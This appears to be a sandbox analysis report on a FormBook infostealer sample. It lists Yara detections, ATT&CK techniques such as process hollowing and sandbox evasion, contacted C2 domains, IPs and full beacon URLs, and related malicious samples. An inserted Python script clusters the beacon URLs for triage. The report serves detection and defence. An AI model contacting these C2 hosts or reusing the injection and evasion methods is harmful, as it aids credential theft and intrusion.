          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\457b22da_by_Libranalysis.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match | File source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match | File source: 00000009.00000002.481738454.00000000011E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.478757286.00000000008F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.276852950.0000000001400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000000.00000002.238968916.00000000037E7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000009.00000002.480717659.0000000000D10000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.276548151.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000004.00000002.276831846.00000000013D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 4.2.457b22da_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 4.2.457b22da_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Masquerading 1 | Input Capture 1 | Security Software Discovery 321 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Archive Collected Data 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 612 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Rundll32 1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 13 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

          Behavior Graph ID: 412121 | Sample: 457b22da_by_Libranalysis | Startdate: 12/05/2021 | Architecture: WINDOWS | Score: 100

          Start
            DNS/IP: www.home-inland.com; www.boostcoachingonline.com; 2 other IPs or domains
            Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 9 other signatures
            -> 457b22da_by_Libranalysis.exe 3 (started)
                 Dropped file: C:\Users\...\457b22da_by_Libranalysis.exe.log, ASCII
                 Signatures: Detected unpacking (changes PE section rights); Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes; Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                 -> 457b22da_by_Libranalysis.exe (started)
                      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
                      -> explorer.exe (injected)
                           DNS/IP: www.thepocket-onlinelesson.xyz 202.210.8.86, 49730, 80 VECTANTARTERIANetworksCorporationJP Japan; rogegalmish.com 192.232.222.43, 49739, 80 UNIFIEDLAYER-AS-1US United States; 12 other IPs or domains
                           Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation
                           -> rundll32.exe (started)
                                Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                                -> cmd.exe 1 (started)
                                     -> conhost.exe (started)

          Screenshots


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          457b22da_by_Libranalysis.exe32%ReversingLabsWin32.Trojan.Wacatac
          457b22da_by_Libranalysis.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

Source | Detection | Scanner | Label
0.2.457b22da_by_Libranalysis.exe.250000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
4.2.457b22da_by_Libranalysis.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          Domains and IPs

          Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
4520oceanviewavenue.com | 184.168.131.241 | true | true | | unknown
home-inland.com | 81.88.52.88 | true | true | | unknown
www.shirleyeluiz.com | 34.95.69.141 | true | false | | unknown
rogegalmish.com | 192.232.222.43 | true | true | | unknown
www.thepocket-onlinelesson.xyz | 202.210.8.86 | true | true | | unknown
www.omfgphil.com | 64.98.145.30 | true | true | | unknown
drisu-goalkeeping.com | 81.169.145.162 | true | true | | unknown
boostcoachingonline.com | 184.168.131.241 | true | true | | unknown
www.skynetaccess.com | 52.128.23.153 | true | true | | unknown
www.best-cleaner.com | 156.252.96.189 | true | true | | unknown
www.drisu-goalkeeping.com | unknown | unknown | true | | unknown
www.boostcoachingonline.com | unknown | unknown | true | | unknown
www.home-inland.com | unknown | unknown | true | | unknown
www.tracisolomon.xyz | unknown | unknown | true | | unknown
www.4520oceanviewavenue.com | unknown | unknown | true | | unknown
www.rogegalmish.com | unknown | unknown | true | | unknown
www.webdomoupravitel.com | unknown | unknown | true | | unknown

                                            Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://www.shirleyeluiz.com/a8si/?NZb=pM4A9y9s2fQOT6MseLZ6D1nJp3ZoXi1DIz8HREKs7lWKo2rCfk3YBCWk1LbwXjkHseQ/&2dND=GVTl- | false | Avira URL Cloud: safe | unknown
www.rogegalmish.com/a8si/ | true | Avira URL Cloud: safe | low
http://www.skynetaccess.com/a8si/?NZb=u+x8HrW8TaP2OTySFAVUaGkyVI6Qrz7itxoztY99JgBPvqcvqvs4xGCSIVWMYkPxCa9b&2dND=GVTl- | true | Avira URL Cloud: safe | unknown
http://www.thepocket-onlinelesson.xyz/a8si/?NZb=AKlWb4FzuMtnty9OGtxovY3lKx8NV8ATEUFEzcIxGa/JytTKcc+qEWA3ceqFQyW9WUsw&2dND=GVTl- | true | Avira URL Cloud: safe | unknown
http://www.best-cleaner.com/a8si/?NZb=62/bSqqzpTDIfVncwf8kcLNbcalsRP0e0Vdwfvu8Ay8ZWoGvbHjczG9DeoieTYsPlzHS&2dND=GVTl- | true | Avira URL Cloud: safe | unknown
http://www.4520oceanviewavenue.com/a8si/?NZb=O3o1U+q8oMW0A40QuM4kzZFzuvGZx18F2J1jOj0HsFueYiG3dIptHphoRZJy//fOFehA&2dND=GVTl- | true | Avira URL Cloud: safe | unknown
http://www.omfgphil.com/a8si/?NZb=jdN+3RUems8XgJANUws4WWtkbvXxMu2hTQ/t6K3f+t8prXi7JgWKk+q+WHlFohFhnqtz&2dND=GVTl- | true | Avira URL Cloud: safe | unknown
http://www.rogegalmish.com/a8si/?NZb=+XN8NDZ1K2QCkRvOhUuLQIc57zcvFV8XafOJaWeGgjvpyrWV+MqtkcBEDSPdl300gZ3G&2dND=GVTl- | true | Avira URL Cloud: safe | unknown
http://www.boostcoachingonline.com/a8si/?NZb=4F1bkU/AiPiMeDtr2vTtPD5XJl4c4IZLVeC3bIU2IShR3AvGXFCeCpQ25wAjwLp6N7J6&2dND=GVTl- | true | Avira URL Cloud: safe | unknown

                                                                        Contacted IPs

                                                                        Public

IP | Domain | Country | ASN | ASN Name | Malicious
52.128.23.153 | www.skynetaccess.com | United States | 19324 | DOSARRESTUS | true
192.232.222.43 | rogegalmish.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
202.210.8.86 | www.thepocket-onlinelesson.xyz | Japan | 2519 | VECTANTARTERIANetworksCorporationJP | true
64.98.145.30 | www.omfgphil.com | Canada | 32491 | TUCOWS-3CA | true
156.252.96.189 | www.best-cleaner.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | true
34.95.69.141 | www.shirleyeluiz.com | United States | 15169 | GOOGLEUS | false
81.169.145.162 | drisu-goalkeeping.com | Germany | 6724 | STRATOSTRATOAGDE | true
184.168.131.241 | 4520oceanviewavenue.com | United States | 26496 | AS-26496-GO-DADDY-COM-LLCUS | true

                                                                        General Information

                                                                        Joe Sandbox Version:32.0.0 Black Diamond
                                                                        Analysis ID:412121
                                                                        Start date:12.05.2021
                                                                        Start time:12:23:27
                                                                        Joe Sandbox Product:CloudBasic
                                                                        Overall analysis duration:0h 10m 39s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:light
                                                                        Sample file name:457b22da_by_Libranalysis (renamed file extension from none to exe)
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                        Number of analysed new started processes analysed:29
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:1
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • HDC enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.evad.winEXE@7/1@12/8
                                                                        EGA Information:Failed
                                                                        HDC Information:
                                                                        • Successful, ratio: 10.6% (good quality ratio 9.1%)
                                                                        • Quality average: 70.1%
                                                                        • Quality standard deviation: 34.3%
                                                                        HCA Information:
                                                                        • Successful, ratio: 96%
                                                                        • Number of executed functions: 0
                                                                        • Number of non-executed functions: 0
                                                                        Cookbook Comments:
                                                                        • Adjust boot time
                                                                        • Enable AMSI
                                                                        Warnings:
                                                                        • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                                                                        • TCP Packets have been reduced to 100
                                                                        • Excluded IPs from analysis (whitelisted): 13.64.90.137, 40.88.32.150, 92.122.145.220, 52.255.188.83, 184.30.20.56, 20.82.209.183, 2.20.142.209, 2.20.143.16, 92.122.213.247, 92.122.213.194, 20.54.26.129, 20.50.102.62
                                                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net
                                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                        • VT rate limit hit for: /opt/package/joesandbox/database/analysis/412121/sample/457b22da_by_Libranalysis.exe

                                                                        Simulations

                                                                        Behavior and APIs

Time | Type | Description
12:24:27 | API Interceptor | 1x Sleep call for process: 457b22da_by_Libranalysis.exe modified

                                                                        Joe Sandbox View / Context

                                                                        IPs

Match / Associated Sample Name | Detection | Context (C2 URL)

Match: 52.128.23.153
  in.exe | malicious | www.industry-automation.com/sjgd/?F6AD0t=4C9RsP0MiMfd5x3EqIWPb8N3LXE5yuIemyiinJZA7tg31FsRjvPmvbnKjZ2+rb6qC4SN&w67=DhrxPvQ0jlAtfdH0
  REQUEST FOR NEW ORDER AND SPECIFICATIONS.exe | malicious | www.ferienschweden.com/dxe/?rL=s6Sqq23Nqxy6Bqc8f3MZosvGevB33GzO29fOayP/lE01Eq/eDpu6VUP0sUjGcOqZY2dQdVIRww==&2dqLWB=RXBtNzex
  krJF4BtzSv.exe | malicious | www.onlineregular.com/oerg/?YL0=8pN4l4&r6A=k0e2T7kvJRK3PRo8y62ai84DWcjvpnsau5YF2j19mIw29CJGigOXt8G+epDiy588L3Hg
  PO_29_00412.exe | malicious | www.neutrasystems.com/hw6d/?rVEt3p=S0D0v04&SPx=eQ0CjYjVQ3ZWFLT9z9t5AWcWjesy46k9o3/PiW4fNWDoBcoO4PdNNvWWcYkTRslbbC22qjAVDA==
  DHL_S390201.exe | malicious | www.tenply.com/u2gd/?IDKPY0x=oAZBYkqsTuez1a9u+6lVnWcl/HQJuhuD2QvfP8fo+EoX0nK3YZBMl6AGY1vurgdkUfL4&Rnm=XPc43lnxP
  y6f8O0kbEB.exe | malicious | www.clipsq.com/oerg/?mHLD_0=ujOXmawhwZWKFGghDr7+X4b1OYMZgrDZqeyOmZXhZPmqT7kE0LgD8cS3WUAvTIFghox1&ndndnZ=UtWlYrO0rhjH
  scan copy 2402021.exe | malicious | www.ehealthak.com/edbs/?pPX=pO0puah+4fLWu/gaJSPwUdJ/22y0P48FdV7vJ0SmK5Njq7Vx485zU7W8W0MYJNonfaHF&1bj=jlK0MdGxr
  Betaling_advies.exe | malicious | www.neutrasystems.com/hw6d/?DnbLu=eQ0CjYjVQ3ZWFLT9z9t5AWcWjesy46k9o3/PiW4fNWDoBcoO4PdNNvWWcbIpStJgY1Xn&EzuxZl=3fX4qpLxXJu
  MACHINE SPECIFICATION.exe | malicious | www.whowealth.com/rrrq/?uDKlwt=XPiPwvlxrzD&0R-LTpD=YmZwcUxE7GKVff8FJDH+eqcbRpVkp9zoSlnpbKTKbaZlz6lL5nVCSfktGblUcnh8IKwh
  50729032021.xlsx | malicious | www.aideliveryrobot.com/p2io/?LPRtv=xikLqsOKlSWJt+SrZg8c4HdBraEMa/77ZWZXTseglAkSxnPi++5EYIqDKkXYJ2G/5JhnXw==&SH=yzu8bdqp
  MACHINE SPECIFICATIONS.exe | malicious | www.whowealth.com/rrrq/?ATxdA4s=YmZwcUxE7GKVff8FJDH+eqcbRpVkp9zoSlnpbKTKbaZlz6lL5nVCSfktGYJufmNHL9RwStorzg==&4hO=uDHPhJIxONuPbDb
  Shipping Documents C1216.exe | malicious | www.toosol.com/fhg5/?idFt5Lt8=Ml/ZzGIGF1FkdUWKp7YfLz5Vhr4JtQgw1RbjRUSw4ruSIMcEU2Te3R8sgnifklbnOlMaPd/2KQ==&TZ=EjUt0xR
  9V3LjvhSMb.exe | malicious | www.digitalkn.com/jzvu/?p0D=mfTHKdP8fLydF&jL04ln=cEqLwIJ+aRwkZKINSQ3QvunM083gkoJjrLpUcp3aBa64+rAHYbkeaE3nOi790R8PidGw
  RDAW-180-47D.exe | malicious | www.oleandrindrugs.com/fhg5/?k2Jdl2Q=OaXU6X18MvJ5q1qcJjJuK08JGFlriH0N3sFKML6er8coazWxslMzDpjffI6ofnfbT4O7&OZiLRb=AnG0VF1hLTBpLbaP
  gV8xdP8bas.exe | malicious | www.wellnesssensation.com/bw82/?KX9ps=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj&t6Ah=oBZx1ZuH5L
  m5bCbJdk7l.exe | malicious | www.wellnesssensation.com/bw82/?9r=Cxl0GPu0O4YH8&lL08q=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z8vR+r7QFaHyR2mgcw==
  xloa.exe | malicious | www.wellnesssensation.com/bw82/?cjlti=VTjl4FmxEtYHGD&FdR0zJRX=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj
  rbyB1UHXxR.exe | malicious | www.wellnesssensation.com/bw82/?jL34YR=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/Dr9qXrGtmj&w0=mfJDabjXTrYll
  4137.exe | malicious | www.bsf.xyz/krc/?XPGx_BL8=oSG3T25g44YEqdHLNcXBvI98o2n2iP7ZIEUUkJplaCBty9zlxmxYbQ+JtR5ITo/P6k1v&5jrH=7n6ti6PHWBWtUvjp
  COAU7229898130.xlsx | malicious | www.digitalkn.com/jzvu/?lf=cEqLwIJ7aWwgZaEBQQ3QvunM083gkoJjrLxEAqrbF665+asBfL1SMAPlNHXrwB48pebAWQ==&JreT=PJE0oxE

Match: 202.210.8.86
  1c60a1e9_by_Libranalysis.rtf | malicious | www.thepocket-onlinelesson.xyz/a8si/?bzrD=AKlWb4F2uLtjtixCEtxovY3lKx8NV8ATEUdUvfUwC6/Iyc/MbMvmSS41f7GTUiSOdXxAeQ==&yxl4A=IJB8SptPOV
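
Every context URL above has the same shape: a hostname, one short path segment, and a query string with two parameters, exactly one of which carries a long base64-alphabet blob. That is the HTTP beacon shape FormBook is known for, and the reason Joe Sandbox can tie unrelated-looking samples to the same IP. The following Python is an added triage example, not part of the Joe Sandbox report: it parses the URLs into host, path token and raw parameters, applies a shape heuristic, and clusters hits by (host, path token). The input list is copied from the rows above with a scheme prepended; the thresholds (3 to 5 character path, blob of at least 40 characters) are my own assumptions, not a rule the report states.

```python
import os
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed input: C2 URLs copied from the IP-context rows above, with "http://"
# added so that urlsplit() treats the first component as the host.
CONTEXT_URLS = [
    "http://www.industry-automation.com/sjgd/?F6AD0t=4C9RsP0MiMfd5x3EqIWPb8N3LXE5yuIemyiinJZA7tg31FsRjvPmvbnKjZ2+rb6qC4SN&w67=DhrxPvQ0jlAtfdH0",
    "http://www.ferienschweden.com/dxe/?rL=s6Sqq23Nqxy6Bqc8f3MZosvGevB33GzO29fOayP/lE01Eq/eDpu6VUP0sUjGcOqZY2dQdVIRww==&2dqLWB=RXBtNzex",
    "http://www.neutrasystems.com/hw6d/?rVEt3p=S0D0v04&SPx=eQ0CjYjVQ3ZWFLT9z9t5AWcWjesy46k9o3/PiW4fNWDoBcoO4PdNNvWWcYkTRslbbC22qjAVDA==",
    "http://www.neutrasystems.com/hw6d/?DnbLu=eQ0CjYjVQ3ZWFLT9z9t5AWcWjesy46k9o3/PiW4fNWDoBcoO4PdNNvWWcbIpStJgY1Xn&EzuxZl=3fX4qpLxXJu",
    "http://www.whowealth.com/rrrq/?uDKlwt=XPiPwvlxrzD&0R-LTpD=YmZwcUxE7GKVff8FJDH+eqcbRpVkp9zoSlnpbKTKbaZlz6lL5nVCSfktGblUcnh8IKwh",
    "http://www.wellnesssensation.com/bw82/?KX9ps=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj&t6Ah=oBZx1ZuH5L",
    "http://www.wellnesssensation.com/bw82/?cjlti=VTjl4FmxEtYHGD&FdR0zJRX=455EGVYP5nwn6UKaNruX/4AMFbR5eugGoFi+RSiFi9xq+Sc4S/7LJuL4z/DBianrCvuj",
]

BASE64_VALUE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
MIN_BLOB_LEN = 40  # assumption: the encoded beacon blob is never shorter than this


def parse_beacon(url):
    """Split a URL into host, path token and raw (key, value) query pairs.

    The query is split by hand on purpose: urllib's parse_qsl() URL-decodes
    '+' to a space, which would silently corrupt the base64 blob.
    """
    parts = urlsplit(url)
    pairs = []
    for item in parts.query.split("&"):
        if item:
            key, _, value = item.partition("=")
            pairs.append((key, value))
    return {"host": parts.hostname, "path": parts.path.strip("/"), "params": pairs}


def beacon_blob(rec):
    """Return the long base64-alphabet value of a record, or None if there is none."""
    for _, value in rec["params"]:
        if len(value) >= MIN_BLOB_LEN and BASE64_VALUE.match(value):
            return value
    return None


def looks_like_formbook_beacon(rec):
    """Shape heuristic: one 3-5 character path segment, exactly two query
    parameters, exactly one of which is a long base64-alphabet blob."""
    path = rec["path"]
    if not (3 <= len(path) <= 5) or "/" in path:
        return False
    if len(rec["params"]) != 2:
        return False
    blobs = [v for _, v in rec["params"] if len(v) >= MIN_BLOB_LEN and BASE64_VALUE.match(v)]
    return len(blobs) == 1


def cluster_by_infrastructure(urls):
    """Group matching URLs by (host, path token). Samples that share both almost
    certainly share a C2 configuration, which is what the context table shows."""
    groups = defaultdict(list)
    for url in urls:
        rec = parse_beacon(url)
        if looks_like_formbook_beacon(rec):
            groups[(rec["host"], rec["path"])].append(url)
    return dict(groups)


def shared_blob_prefix(urls):
    """Longest common prefix of the blobs in one group. Two beacons only share a
    long prefix if the same encoding key covered the same leading data, so this
    separates 'same domain, different victims' from 'same victim, repeated beacon'."""
    blobs = [beacon_blob(parse_beacon(u)) for u in urls]
    return os.path.commonprefix(blobs)


if __name__ == "__main__":
    for (host, path), urls in cluster_by_infrastructure(CONTEXT_URLS).items():
        print(f"{host}/{path}: {len(urls)} sample(s), shared blob prefix {len(shared_blob_prefix(urls))} chars")
```

This matches on shape only. Short-path CDN or tracking URLs with one opaque token can hit it too, so confirm a hit against the report's own network section before treating it as C2.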

                                                                        Domains

Match / Associated Sample Name | Detection | Context (IP)

Match: www.thepocket-onlinelesson.xyz
  1c60a1e9_by_Libranalysis.rtf | malicious | 202.210.8.86

                                                                        ASN

Match / Associated Sample Name | Detection | Context (IP)

Match: UNIFIEDLAYER-AS-1 (US)
  abc8a77f_by_Libranalysis.xlsx | malicious | 67.20.76.71
  Revised Invoice pdf.exe | malicious | 192.185.171.219
  DINTEC HCU24021ED.exe | malicious | 162.241.169.22
  dd9097e7_by_Libranalysis.exe | malicious | 192.185.171.219
  RFQ.exe | malicious | 192.185.129.32
  Order 122001-220 guanzo.exe | malicious | 162.241.62.63
  in.exe | malicious | 162.241.244.112
  PO-002755809-NO#PRT101 Order pdf.exe | malicious | 162.144.13.239
  catalog-1908475637.xls | malicious | 108.167.180.164
  catalog-1908475637.xls | malicious | 108.167.180.164
  export of purchase order 7484876.xlsm | malicious | 108.179.232.90
  XM7eDjwHqp.xlsm | malicious | 162.241.190.216
  QTFsui5pLN.xlsm | malicious | 108.179.232.90
  15j1TCnOiA.xlsm | malicious | 192.185.115.105
  e8eRhf3GM0.xlsm | malicious | 162.241.190.216
  SOA PDF.exe | malicious | 192.185.226.148
  djBLaxEojp.exe | malicious | 192.185.161.67
  quotation 35420PDF.exe | malicious | 192.185.41.225
  REQUEST FOR PRICE QUOTE - URGENT.pdf.exe | malicious | 162.241.24.59
  551f47ac_by_Libranalysis.xlsm | malicious | 192.185.138.180

Match: VECTANTARTERIANetworksCorporation (JP)
  1c60a1e9_by_Libranalysis.rtf | malicious | 202.210.8.86
  Purchase Inquiry 11.05.2021.exe | malicious | 202.210.8.60
  0876543123.exe | malicious | 202.210.8.120
  Project Decision 2021.exe | malicious | 183.181.86.59
  S4gONKzrzB.exe | malicious | 210.131.150.117
  PAGO 50,867.00 USD (ANTICIPO) 23042021 DOC-20204207MT-1.exe | malicious | 202.210.8.149
  VIKRAMQST21-222.exe | malicious | 202.210.8.149
  MGuvcs6Ocz | malicious | 157.14.182.109
  SWIFT COPY.exe | malicious | 103.141.96.11
  9JFrEPf5w7.exe | malicious | 103.15.186.68
  Purchase Order.xlsx | malicious | 103.15.186.68
  PO91361.exe | malicious | 103.15.186.10
  ccavero@hycite.com.htm | malicious | 203.114.55.132
  MV Sky Marine.xlsx | malicious | 202.210.8.141
  SWIFT COPY_PDF.exe | malicious | 202.210.8.141
  MV9tCJw8Xr.exe | malicious | 120.51.34.254
  SHED.EXE | malicious | 103.141.96.21
  swift copy pdf.exe | malicious | 183.181.84.122
  shipping docs of MT20410.exe | malicious | 183.181.84.122
  PO#4503527426.xlsx | malicious | 43.249.241.188

Match: DOSARREST (US)
  in.exe | malicious | 52.128.23.153
  REQUEST FOR NEW ORDER AND SPECIFICATIONS.exe | malicious | 52.128.23.153
  krJF4BtzSv.exe | malicious | 52.128.23.153
  PO_29_00412.exe | malicious | 52.128.23.153
  DHL_S390201.exe | malicious | 52.128.23.153
  y6f8O0kbEB.exe | malicious | 52.128.23.153
  scan copy 2402021.exe | malicious | 52.128.23.153
  Betaling_advies.exe | malicious | 52.128.23.153
  Order.exe | malicious | 52.128.23.218
  MACHINE SPECIFICATION.exe | malicious | 52.128.23.153
  bank details.exe | malicious | 52.128.23.218
  50729032021.xlsx | malicious | 52.128.23.153
  MACHINE SPECIFICATIONS.exe | malicious | 52.128.23.153
  Shipping Documents C1216.exe | malicious | 52.128.23.153
  9V3LjvhSMb.exe | malicious | 52.128.23.153
  RDAW-180-47D.exe | malicious | 52.128.23.153
  gV8xdP8bas.exe | malicious | 52.128.23.153
  m5bCbJdk7l.exe | malicious | 52.128.23.153
  xloa.exe | malicious | 52.128.23.153
  rbyB1UHXxR.exe | malicious | 52.128.23.153

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\457b22da_by_Libranalysis.exe.log
                                                                        Process:C:\Users\user\Desktop\457b22da_by_Libranalysis.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):1314
                                                                        Entropy (8bit):5.350128552078965
                                                                        Encrypted:false
                                                                        SSDEEP:24:ML9E4Ks2f84jE4Kx1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MxHKXfvjHKx1qHiYHKhQnoPtHoxHhAHR
                                                                        MD5:8198C64CE0786EABD4C792E7E6FC30E5
                                                                        SHA1:71E1676126F4616B18C751A0A775B2D64944A15A
                                                                        SHA-256:C58018934011086A883D1D56B21F6C1916B1CD83206ADD1865C9BDD29DADCBC4
                                                                        SHA-512:EE293C0F88A12AB10041F66DDFAE89BC11AB3B3AAD8604F1A418ABE43DF0980245C3B7F8FEB709AEE8E9474841A280E073EC063045EA39948E853AA6B4EC0FB0
                                                                        Malicious:true
                                                                        Reputation:moderate, very likely benign file
